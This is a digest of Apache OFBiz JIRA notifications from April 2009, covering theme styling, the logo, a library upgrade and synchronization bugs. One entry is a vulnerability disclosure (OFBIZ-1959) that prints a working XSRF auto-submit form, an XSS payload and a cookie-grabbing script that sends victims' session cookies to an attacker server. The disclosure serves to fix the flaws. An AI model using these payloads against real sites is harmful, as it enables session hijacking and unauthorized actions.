[jira] Issue Comment Edited: (OFBIZ-2312) Styling flaws in smoothfeather

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2312?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700089#action_12700089
 ] 

Jacques Le Roux edited comment on OFBIZ-2312 at 4/17/09 2:11 AM:
-

David,

Issue 1 : it's a bit better but on Windows with FF3 not quite right.

I wondered how to close (sub-)issues here. I thought about removing comments 
but editing the original comment and  using -understrike- with a notice should 
be far better. You get  -understrike- using \-understrike\-


  was (Author: jacques.le.roux):
David,

Issue 1 : it's a bit better but on Windows with FF3 not quite right.

I wondered how to close (sub-)issues here. I thought about removing comments 
but  using -understrike- with a notice should be far better. You get  
-understrike- using \-understrike\-

  
 Styling flaws in smoothfeather
 --

 Key: OFBIZ-2312
 URL: https://issues.apache.org/jira/browse/OFBIZ-2312
 Project: OFBiz
  Issue Type: Sub-task
Affects Versions: SVN trunk
 Environment: XP FF3
Reporter: Jacques Le Roux
 Fix For: SVN trunk


 I was to create an issue for each styling flaws in smoothfeather, but it's 
 far too mcuh work. So I have created only one issue to list what we find.
 We can create a numbered comment for each issue to separate them and refer 
 easily to them whe fixed. Here we go
 I wondered how to close (sub-)issues here. I thought about removing 
 comments but editing the original comment and  using -understrike- with a 
 notice should be far better. You get  -understrike- using \-understrike\-

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2312) Styling flaws in smoothfeather

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2312?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700094#action_12700094
 ] 

Jacques Le Roux commented on OFBIZ-2312:


Issue 1 : On Windows, it's ok with Safari, Chrome and IE8 (with an error 
message see Issue 12) but not with FF3 and Opera. It's (almost OK with Opera, 
less with FF3, so I guess making the border a bit more wide should solve this 
issue

 Styling flaws in smoothfeather
 --

 Key: OFBIZ-2312
 URL: https://issues.apache.org/jira/browse/OFBIZ-2312
 Project: OFBiz
  Issue Type: Sub-task
Affects Versions: SVN trunk
 Environment: XP FF3
Reporter: Jacques Le Roux
 Fix For: SVN trunk


 I was to create an issue for each styling flaws in smoothfeather, but it's 
 far too mcuh work. So I have created only one issue to list what we find.
 We can create a numbered comment for each issue to separate them and refer 
 easily to them whe fixed. Here we go
 I wondered how to close (sub-)issues here. I thought about removing 
 comments but editing the original comment and  using -understrike- with a 
 notice should be far better. You get  -understrike- using \-understrike\-

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700123#action_12700123
 ] 

Jacques Le Roux commented on OFBIZ-2298:


The issue on tables also apply toPDF files (from a personnal message received 
from Alain Ivars. Alain has created [a site - mostly in French for now - to 
compare open source ERPs|http://www.choiceerp.org/]

 Issue with the new smoothfeather look in OFBiz documentation (Confluence)
 -

 Key: OFBIZ-2298
 URL: https://issues.apache.org/jira/browse/OFBIZ-2298
 Project: OFBiz
  Issue Type: Improvement
 Environment: NA
Reporter: Jacques Le Roux

 The styles associate with
 *
 and
 **
 are not rendering bullets now. Could it be possible to differentiate simple 
 indentation with bullet (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-1959) Multiple Security Issues (XSRF, XSS, Session Hijacking): exploitation and mitigation

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-1959?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700137#action_12700137
 ] 

Jacques Le Roux commented on OFBIZ-1959:


Thanks for you help Michele!

 Multiple Security Issues (XSRF, XSS, Session Hijacking): exploitation and 
 mitigation
 

 Key: OFBIZ-1959
 URL: https://issues.apache.org/jira/browse/OFBIZ-1959
 Project: OFBiz
  Issue Type: Bug
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Michele Orru
Priority: Critical
 Fix For: Release Branch 9.04, SVN trunk


 +++|||Discovered security 
 issues|||+
   
   1.: Cross Site Request Forgery (XSRF) on almost every front/back-end 
 requests
   2.: reflected/stored XSS in search, ProductId/Product Internal name and 
 so on
   3.: Session Hijacking
 +++|||Exploitation|||+
 1.: As can be verified with your favorite proxy tool (we use Burp), POST 
 request
 parameters are never fortified to prevent XSRF: no random token protection 
 can be seen.
 For those who don't know what a XSRF is: briefly it is a request that me, the 
 attacker, force you (the victim)
 to executes. 
  - In GET requests it will be a link like 
 http://x.x.x.x/account/doTransfer?from=666to=667, where 666 is
 a potential victim account and 667 the attacker one. 
  - In POST requests it will be an auto-submit form or a XMLHttpRequest 
 (if we would like to be more sophisticated).
 I can force a victim to execute such a request in various methods, whose 
 description is out from the scope of this ISSUE:
 malicious mail link, link in chat programs, malicious pages, man in the 
 middle attacks, malicious Flash/Applets/ActiveX, and so on.
 The quick-and dirty code to make the XSRF attack looks as the following 
 innocuous one:
   
   form method=POST id=xsrf name=xsrf 
  
 action=https://127.0.0.1:8443/catalog/control/createProduct; 
   input type=hidden name=isCreate value=true 
   input type=hidden name=productId value=hack02
   input type=hidden name=productTypeId value=DIGITAL_GOOD
   input type=hidden name=internalName value=hack02
/form  
   scriptdocument.xsrf.submit(); /script
 Of course the product-creation mechanism is not finished (we need price, 
 content and ProductName), 
 but is just to let you understand.
 When this JS code will be present in a malicious page (opened by a new tab of 
 the same browser - not Chrome ahah), 
 his content will be automatically executed and the POST request will be sent 
 to the application: the product with Id=hack02
 will be persisted inside the DB. Of course a valid party must be logged in 
 the catalog module, in a way
 that the global JSESSIONID cookie value will be the same in every tab of the 
 browser.  
 Clearly we can do more than this...
 2.: As most of the Ofbiz forms are vulnerable to XSS, some reflected and some 
 stored,
 exploit them is quite easy: we will exploited only stored ones.
 We can for instance replace the value of internalName (that even if it is a 
 needed
 parameter is quite un-useful and so prone to store our malicious code) with 
 something 
 like:
   
   input type=hidden name=internalName
   
 value=scriptalert(document.cookie)/script
   
 The malicious code will display every cookie information in a pop-up, that 
 only the victim 
 will see: obviously we don't want this.
 3.: We can then create a little cookie-grabber servlet that listen for GET 
 request from 
 our victims, extract the useful parameters and store them in a file or DB, in 
 a way
 that wen can hijack the session of the admin/manager.
   
 The internalName value is prone to store our malicious code also because his 
 maxlength 
 is 255 characters: this gives us a great advantage when creating a complex 
 injection code, 
 if we don't want to inject a link to the malicious script like 
 img src=http://x.x.x.x/malicious.js;
   
 The malicious code will look as the following one:
   
 script 
 var 
 str=http://ourHackServer/CookieWebServlet?cookie=+document.cookie+url=+document.URL;
  
   if(document.cookie.indexOf(done)0)\{ 
  document.cookie=done=true;
  document.location.replace(str); 
   }
 /script 
   
 Of course the code can be a lot shorter, and the already-exploited-check 
 can be removed.
   
 After we have a valid JSESSIONID, if we open a browser, go to the grabbed URL 
 (remember document.URL) that will be an
 authentication-required resource, the login page will ask us 

[jira] Commented: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700140#action_12700140
 ] 

Jacques Le Roux commented on OFBIZ-2298:


An example for the table issue 
http://docs.ofbiz.org/display/OFBIZ/Apache+OFBiz+User+List

 Issue with the new smoothfeather look in OFBiz documentation (Confluence)
 -

 Key: OFBIZ-2298
 URL: https://issues.apache.org/jira/browse/OFBIZ-2298
 Project: OFBiz
  Issue Type: Improvement
 Environment: NA
Reporter: Jacques Le Roux

 The styles associate with
 *
 and
 **
 are not rendering bullets now. Could it be possible to differentiate simple 
 indentation with bullet (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700142#action_12700142
 ] 

Jacques Le Roux commented on OFBIZ-2298:


Not sure it's due to styling : the PDF icon (on top) is not available under IE 8

 Issue with the new smoothfeather look in OFBiz documentation (Confluence)
 -

 Key: OFBIZ-2298
 URL: https://issues.apache.org/jira/browse/OFBIZ-2298
 Project: OFBiz
  Issue Type: Improvement
 Environment: NA
Reporter: Jacques Le Roux

 The styles associate with
 *
 and
 **
 are not rendering bullets now. Could it be possible to differentiate simple 
 indentation with bullet (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2312) Styling flaws in smoothfeather

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2312?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700100#action_12700100
 ] 

Jacques Le Roux commented on OFBIZ-2312:


Issue 1 (login screen border not enough wide)

I tried to put 400 instead of 350 at 
.login-screenlet{
in login.css

But it does not work (do nothing). Increasing the height works, gave up :(

 Styling flaws in smoothfeather
 --

 Key: OFBIZ-2312
 URL: https://issues.apache.org/jira/browse/OFBIZ-2312
 Project: OFBiz
  Issue Type: Sub-task
Affects Versions: SVN trunk
 Environment: XP FF3
Reporter: Jacques Le Roux
 Fix For: SVN trunk


 I was to create an issue for each styling flaws in smoothfeather, but it's 
 far too mcuh work. So I have created only one issue to list what we find.
 We can create a numbered comment for each issue to separate them and refer 
 easily to them whe fixed. Here we go
 I wondered how to close (sub-)issues here. I thought about removing 
 comments but editing the original comment and  using -understrike- with a 
 notice should be far better. You get  -understrike- using \-understrike\-
 If someone feels that the sub-issues here should be splitted in standard 
 sub-tasks of OFBIZ-2309, please feel free to do so 

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2312) Styling flaws in smoothfeather

2009-04-17 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2312?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2312:
---

Description: 
I was to create an issue for each styling flaws in smoothfeather, but it's far 
too mcuh work. So I have created only one issue to list what we find.
We can create a numbered comment for each issue to separate them and refer 
easily to them whe fixed. Here we go

I wondered how to close (sub-)issues here. I thought about removing comments 
but editing the original comment and  using -understrike- with a notice should 
be far better. You get  -understrike- using \-understrike\-

If someone feels that the sub-issues here should be splitted in standard 
sub-tasks of OFBIZ-2309 (or even better of the current issue), please feel free 
to do so 


  was:
I was to create an issue for each styling flaws in smoothfeather, but it's far 
too mcuh work. So I have created only one issue to list what we find.
We can create a numbered comment for each issue to separate them and refer 
easily to them whe fixed. Here we go

I wondered how to close (sub-)issues here. I thought about removing comments 
but editing the original comment and  using -understrike- with a notice should 
be far better. You get  -understrike- using \-understrike\-

If someone feels that the sub-issues here should be splitted in standard 
sub-tasks of OFBIZ-2309, please feel free to do so 



 Styling flaws in smoothfeather
 --

 Key: OFBIZ-2312
 URL: https://issues.apache.org/jira/browse/OFBIZ-2312
 Project: OFBiz
  Issue Type: Sub-task
Affects Versions: SVN trunk
 Environment: XP FF3
Reporter: Jacques Le Roux
 Fix For: SVN trunk


 I was to create an issue for each styling flaws in smoothfeather, but it's 
 far too mcuh work. So I have created only one issue to list what we find.
 We can create a numbered comment for each issue to separate them and refer 
 easily to them whe fixed. Here we go
 I wondered how to close (sub-)issues here. I thought about removing 
 comments but editing the original comment and  using -understrike- with a 
 notice should be far better. You get  -understrike- using \-understrike\-
 If someone feels that the sub-issues here should be splitted in standard 
 sub-tasks of OFBIZ-2309 (or even better of the current issue), please feel 
 free to do so 

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2312) Styling flaws in smoothfeather

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2312?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700096#action_12700096
 ] 

Jacques Le Roux commented on OFBIZ-2312:


Issue 12

With IE8 (and I suppose older versions) you get this error  message

Message : Cet objet ne gère pas cette propriété ou cette méthode (This object 
does not manage this property or this method)
Ligne : 236
Caractère : 2
Code : 0
URI : https://localhost:18443/smoothfeather/js/global.js



 Styling flaws in smoothfeather
 --

 Key: OFBIZ-2312
 URL: https://issues.apache.org/jira/browse/OFBIZ-2312
 Project: OFBiz
  Issue Type: Sub-task
Affects Versions: SVN trunk
 Environment: XP FF3
Reporter: Jacques Le Roux
 Fix For: SVN trunk


 I was to create an issue for each styling flaws in smoothfeather, but it's 
 far too mcuh work. So I have created only one issue to list what we find.
 We can create a numbered comment for each issue to separate them and refer 
 easily to them whe fixed. Here we go
 I wondered how to close (sub-)issues here. I thought about removing 
 comments but editing the original comment and  using -understrike- with a 
 notice should be far better. You get  -understrike- using \-understrike\-

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2297) Misc improvements on Payment Gateway Config

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2297?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700151#action_12700151
 ] 

Jacques Le Roux commented on OFBIZ-2297:


I already said on del ML that I agree with Ashish. I'm for conventions. They 
often prove useful (S/R with regex is a good example) not using them don't

 Misc improvements on Payment Gateway Config
 ---

 Key: OFBIZ-2297
 URL: https://issues.apache.org/jira/browse/OFBIZ-2297
 Project: OFBiz
  Issue Type: Improvement
  Components: accounting
Reporter: Marco Risaliti
Assignee: Marco Risaliti
Priority: Minor
 Attachments: MiscImprPaymentGateway.patch


 1) encrypt passwords.
 2) service names changed.
 3) request map entries changed.
 4) now the Payment Gateway Config menu is visible only to user having 
 PAYPROC_ADMIN permission.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700169#action_12700169
 ] 

Jacques Le Roux commented on OFBIZ-2298:


Alain Ivars just tell me that the tables work well with IE6, confusing ;)

 Issue with the new smoothfeather look in OFBiz documentation (Confluence)
 -

 Key: OFBIZ-2298
 URL: https://issues.apache.org/jira/browse/OFBIZ-2298
 Project: OFBiz
  Issue Type: Improvement
 Environment: NA
Reporter: Jacques Le Roux

 The styles associate with
 *
 and
 **
 are not rendering bullets now. Could it be possible to differentiate simple 
 indentation with bullet (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2316) Replace the footer in smoothfeater

2009-04-17 Thread Jacques Le Roux (JIRA)
Replace the footer in smoothfeater
--

 Key: OFBIZ-2316
 URL: https://issues.apache.org/jira/browse/OFBIZ-2316
 Project: OFBiz
  Issue Type: Sub-task
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk
 Attachments: screenshot-1.jpg

ON dev ML, my request was

Actually the things that IMO are missing are
* The ASF copyright and link to a apache.org site
* Powered by OFBiz and link to ofbiz.apache.org
*  Release.revision informations

Here is Ryan Foster's proposition

The originally thinking was to give the backend look and feel a more desktop 
like feeling, where most of the information and navigation is located in 
sidebars, file menus, tabs, etc.  Following that line of thinking, maybe we put 
a help link in the header right next to preferences that drops down in a 
similar fashion to show copyright, link to apache, etc.  This would function 
exactly the same way that the help link functions in apps like Firefox, Mac 
Mail, Outlook, Word, etc.  We could even put a simple keyword search field in 
this section that searches docs.ofbiz.org.  See the attached screenshot for an 
example.




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2316) Replace the footer in smoothfeater

2009-04-17 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2316:
---

Attachment: screenshot-1.jpg

 Replace the footer in smoothfeater
 --

 Key: OFBIZ-2316
 URL: https://issues.apache.org/jira/browse/OFBIZ-2316
 Project: OFBiz
  Issue Type: Sub-task
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: screenshot-1.jpg


 ON dev ML, my request was
 Actually the things that IMO are missing are
 * The ASF copyright and link to a apache.org site
 * Powered by OFBiz and link to ofbiz.apache.org
 *  Release.revision informations
 Here is Ryan Foster's proposition
 The originally thinking was to give the backend look and feel a more 
 desktop like feeling, where most of the information and navigation is 
 located in sidebars, file menus, tabs, etc.  Following that line of thinking, 
 maybe we put a help link in the header right next to preferences that drops 
 down in a similar fashion to show copyright, link to apache, etc.  This would 
 function exactly the same way that the help link functions in apps like 
 Firefox, Mac Mail, Outlook, Word, etc.  We could even put a simple keyword 
 search field in this section that searches docs.ofbiz.org.  See the attached 
 screenshot for an example.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2317) Upgrade of the fop library (0.94 - 0.95)

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2317?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700243#action_12700243
 ] 

Jacques Le Roux commented on OFBIZ-2317:


Hi Erwan,

Why did you decide to not clear the caches as it was done before ?

Also please include the LICENCE file in your changes

Thanks

 Upgrade of the fop library (0.94 - 0.95)
 -

 Key: OFBIZ-2317
 URL: https://issues.apache.org/jira/browse/OFBIZ-2317
 Project: OFBiz
  Issue Type: Improvement
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Erwan de FERRIERES
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: diff.patch, fop-0.95.jar




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2318) Update the DOWNLOAD NOW link to take you to the download page - not download straight away.

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2318?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700251#action_12700251
 ] 

Jacques Le Roux commented on OFBIZ-2318:


Updated the site on  /www/ofbiz.apache.org (BTW no problems now with 
sub-directories permissions, thanks David)

 Update the DOWNLOAD NOW link to take you to the download page - not download 
 straight away.
 ---

 Key: OFBIZ-2318
 URL: https://issues.apache.org/jira/browse/OFBIZ-2318
 Project: OFBiz
  Issue Type: Improvement
  Components: site
Affects Versions: SVN trunk
Reporter: Tim Ruppert
Assignee: Andrew Zeneski
 Fix For: SVN trunk

 Attachments: changeDownloadLink.html


 Per Adam's recommendation - let's take the user to the download page so they 
 understand it a bit better instead of having them download it without 
 directions.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2317) Upgrade of the fop library (0.94 - 0.95)

2009-04-17 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2317?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2317:
---

Attachment: LICENSE.patch

 Upgrade of the fop library (0.94 - 0.95)
 -

 Key: OFBIZ-2317
 URL: https://issues.apache.org/jira/browse/OFBIZ-2317
 Project: OFBiz
  Issue Type: Improvement
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Erwan de FERRIERES
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: diff.patch, fop-0.95.jar, LICENSE, LICENSE.patch




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2317) Upgrade of the fop library (0.94 - 0.95)

2009-04-17 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2317?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2317.
--

   Resolution: Fixed
Fix Version/s: (was: Release Branch 9.04)
 Assignee: Jacques Le Roux

Your changes are in trunk at r766125
What I was looking for when I spoke about LICENCE was a patch (loolk at the 
file I attached you will nderstand)
Also this will not be backported to 9.04 since it does not fix any bugs (to 
avoid any regression issues)

 Upgrade of the fop library (0.94 - 0.95)
 -

 Key: OFBIZ-2317
 URL: https://issues.apache.org/jira/browse/OFBIZ-2317
 Project: OFBiz
  Issue Type: Improvement
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Erwan de FERRIERES
Assignee: Jacques Le Roux
 Fix For: SVN trunk

 Attachments: diff.patch, fop-0.95.jar, LICENSE, LICENSE.patch




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2317) Upgrade of the fop library (0.94 - 0.95)

2009-04-17 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2317?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700314#action_12700314
 ] 

Jacques Le Roux commented on OFBIZ-2317:


Forgot one thing : thank you Erwan!

 Upgrade of the fop library (0.94 - 0.95)
 -

 Key: OFBIZ-2317
 URL: https://issues.apache.org/jira/browse/OFBIZ-2317
 Project: OFBiz
  Issue Type: Improvement
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Erwan de FERRIERES
Assignee: Jacques Le Roux
 Fix For: SVN trunk

 Attachments: diff.patch, fop-0.95.jar, LICENSE, LICENSE.patch




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-18 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700481#action_12700481
 ] 

Jacques Le Roux commented on OFBIZ-2298:


I just tested for the issue on table, it's the same with FF3 on Linux (at least 
Ubuntu 8.04)

 Issue with the new smoothfeather look in OFBiz documentation (Confluence)
 -

 Key: OFBIZ-2298
 URL: https://issues.apache.org/jira/browse/OFBIZ-2298
 Project: OFBiz
  Issue Type: Improvement
 Environment: NA
Reporter: Jacques Le Roux

 The styles associate with
 *
 and
 **
 are not rendering bullets now. Could it be possible to differentiate simple 
 indentation with bullet (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2322) Old logo removed, but new logo not referenced in ecommerce

2009-04-18 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2322?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700484#action_12700484
 ] 

Jacques Le Roux commented on OFBIZ-2322:


Hi Tim,

Yes, David changed that recently. The idea was to use the smoothfeather theme 
with R9.04 (but as he encountered issues he gave up about that). For this he 
had to move ofbiz.ico and ofbiz_logo.jpg to  \themes\flatgrey. I have also to 
cope with that (*and any non official ASF infra server*, Marco ;)) since my 
alternate servers should not show these images as they are strict ASF 
proprietary. I will fill a msg for that on dev and user MLs and I wonder if we 
should not +_state it properly on main page_+. Ted Husted was very clear about 
that ! BTW I think I will right now...

 Old logo removed, but new logo not referenced in ecommerce
 --

 Key: OFBIZ-2322
 URL: https://issues.apache.org/jira/browse/OFBIZ-2322
 Project: OFBiz
  Issue Type: Bug
  Components: framework
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Tim Ruppert
 Fix For: Release Branch 9.04, SVN trunk


 Currently on this page - https://demo.ofbiz.org/images/ofbiz_logo.jpg and 
 https://demo904.ofbiz.org/images/ofbiz_logo.jpg - the OFBiz logo in the top 
 corner appears to not be referenceable.  This is also a problem for the 
 favicon - https://demo.ofbiz.org/images/ofbiz.ico - which doesn't show up 
 either :(
 Please update this with the proper logo file.  Here's a find looking for it, 
 but I'm not sure which one we're supposed to use:
 rover:ofbiz-trunk ruppert$ find . -name ofbiz_logo.*
 ./specialpurpose/cmssite/webapp/ofbizsite/images/.svn/prop-base/ofbiz_logo.jpg.svn-base
 ./specialpurpose/cmssite/webapp/ofbizsite/images/.svn/text-base/ofbiz_logo.jpg.svn-base
 ./specialpurpose/cmssite/webapp/ofbizsite/images/ofbiz_logo.jpg
 ./themes/bluelight/webapp/bluelight/.svn/prop-base/ofbiz_logo.gif.svn-base
 ./themes/bluelight/webapp/bluelight/.svn/text-base/ofbiz_logo.gif.svn-base
 ./themes/bluelight/webapp/bluelight/ofbiz_logo.gif
 ./themes/flatgrey/webapp/flatgrey/.svn/prop-base/ofbiz_logo.jpg.svn-base
 ./themes/flatgrey/webapp/flatgrey/.svn/text-base/ofbiz_logo.jpg.svn-base
 ./themes/flatgrey/webapp/flatgrey/ofbiz_logo.jpg
 Let's make sure it's the new one though 

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2322) Old logo removed, but new logo not referenced in ecommerce

2009-04-18 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2322?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700489#action_12700489
 ] 

Jacques Le Roux commented on OFBIZ-2322:


Yes sure, these are 2 distinct things.

 Old logo removed, but new logo not referenced in ecommerce
 --

 Key: OFBIZ-2322
 URL: https://issues.apache.org/jira/browse/OFBIZ-2322
 Project: OFBiz
  Issue Type: Bug
  Components: framework
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Tim Ruppert
 Fix For: Release Branch 9.04, SVN trunk


 Currently on this page - https://demo.ofbiz.org/images/ofbiz_logo.jpg and 
 https://demo904.ofbiz.org/images/ofbiz_logo.jpg - the OFBiz logo in the top 
 corner appears to not be referenceable.  This is also a problem for the 
 favicon - https://demo.ofbiz.org/images/ofbiz.ico - which doesn't show up 
 either :(
 Please update this with the proper logo file.  Here's a find looking for it, 
 but I'm not sure which one we're supposed to use:
 rover:ofbiz-trunk ruppert$ find . -name ofbiz_logo.*
 ./specialpurpose/cmssite/webapp/ofbizsite/images/.svn/prop-base/ofbiz_logo.jpg.svn-base
 ./specialpurpose/cmssite/webapp/ofbizsite/images/.svn/text-base/ofbiz_logo.jpg.svn-base
 ./specialpurpose/cmssite/webapp/ofbizsite/images/ofbiz_logo.jpg
 ./themes/bluelight/webapp/bluelight/.svn/prop-base/ofbiz_logo.gif.svn-base
 ./themes/bluelight/webapp/bluelight/.svn/text-base/ofbiz_logo.gif.svn-base
 ./themes/bluelight/webapp/bluelight/ofbiz_logo.gif
 ./themes/flatgrey/webapp/flatgrey/.svn/prop-base/ofbiz_logo.jpg.svn-base
 ./themes/flatgrey/webapp/flatgrey/.svn/text-base/ofbiz_logo.jpg.svn-base
 ./themes/flatgrey/webapp/flatgrey/ofbiz_logo.jpg
 Let's make sure it's the new one though 

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2315) TransactionUtil : 3 Map corruptions related to mis synchronization

2009-04-19 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2315?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700584#action_12700584
 ] 

Jacques Le Roux commented on OFBIZ-2315:


Philippe,

David has commited changes at r766429. Not sure if it's complete since Davd did 
not close this issue yet...

 TransactionUtil : 3 Map corruptions related to mis synchronization
 --

 Key: OFBIZ-2315
 URL: https://issues.apache.org/jira/browse/OFBIZ-2315
 Project: OFBiz
  Issue Type: Bug
Affects Versions: Release Branch 4.0, SVN trunk
Reporter: Philippe Mouawad
 Attachments: ContentionLog.txt, patch-TransactionUtil.patch


 Randomly we are having Thread contention problems in production related to 
 synchronization issues in this class.
 See attached log file.
 As you can see, a lot of threads are locked by some code called by 
 TransactionUtil.setTransactionBeginStack that has been running for 180165 ms :
 Thread[default-invoker-Thread-4582999,5,main]:4590333, stackTrace:
   javolution.util.FastMap.mapEntry(Unknown Source)
   javolution.util.FastMap.access$1200(Unknown Source)
   javolution.util.FastMap$3.run(Unknown Source)
   javax.realtime.MemoryArea.executeInArea(Unknown Source)
   javolution.util.FastMap.resizeTable(Unknown Source)
   javolution.util.FastMap.mapEntry(Unknown Source)
   javolution.util.FastMap.addEntry(Unknown Source)
   javolution.util.FastMap.put(Unknown Source)
   
 org.ofbiz.entity.transaction.TransactionUtil.setTransactionBeginStack(TransactionUtil.java:657)
   
 org.ofbiz.entity.transaction.TransactionUtil.setTransactionBeginStack(TransactionUtil.java:646)
   
 org.ofbiz.entity.transaction.TransactionUtil.begin(TransactionUtil.java:135)
